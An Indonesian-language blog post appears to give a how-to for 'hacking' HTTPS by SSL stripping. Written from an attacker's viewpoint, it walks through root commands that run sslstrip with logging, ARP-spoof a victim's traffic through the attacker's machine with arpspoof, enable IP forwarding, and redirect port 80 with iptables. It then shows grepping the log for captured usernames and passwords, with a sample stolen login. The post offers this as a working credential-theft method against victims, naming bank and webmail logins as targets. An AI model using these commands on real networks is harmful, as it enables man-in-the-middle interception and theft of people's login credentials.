how to : https protocol hacking

hufftt.. sekian lama vakum didunia underground, baru sempat nambah-nambah ilmu lagi.. ok,sedikit nge-bacrit :
awalnya penasaram, untuk apa sih dibuat protocol https seperti login yahoo, bank mandiri dan sebagainya? yup, betul.. secara gw males jelasin, pahami aja disini.

setelah jungkir balik kanan kiri guling-guling sampe gelas kopi pecah, akhirnya dapet suatu software yang yaa lumayan menurutku untuk menghack protocol https alias ssl hijacking. keterangannya silahkan baca disini atau disini dan juga disini dan masih banyak lagi…

nge-bacrit selesai.. langsung ke TKP :

1. semisal aja,
attacker : 172.192.30.30
victim : 172.192.30.40
gateway : 172.192.30.254

information : artikel ini menggunakan sistem operasi linux

2. command : sslstrip
manual options:
-w , –write= Specify file to log to (optional).
-p , –post Log only SSL POSTs. (default)
-s , –ssl Log all SSL traffic to and from server.
-a , –all Log all SSL and HTTP traffic to and from server.
-l , –listen= Port to listen on (default 10000).
-f , –favicon Substitute a lock favicon on secure requests.
-k , –killsessions Kill sessions in progress.
-h Print this help message

3 . execute :
root@spyro:~# sslstrip -a -w logfilename

4. execute arpspoof of the victim :
root@spyro:~# arpspoof -i vmnet1 -t 172.192.30.40 172.192.30.254

5. activate a ip_forward function :
root@spyro:~# echo 1 > /proc/sys/net/ipv4/ip_forward

6. redirect http port victim communication to sslstrip port
root@spyro:~# iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 10000

nah, ketika victim melakukan login ke port https, maka username n passwordnya akan tercatat di log file dump yang kita buat (dalam artikel ini nama filenya “logfilename”)

7. view a dump log file :
root@spyro:~# cat logfilename | grep -i “passwd=”

lihat dan cari kata kunci “login=” dan “passwd=”
ex : login=dhymaz_spyro&passwd=djancuukkk

thankz to laharisi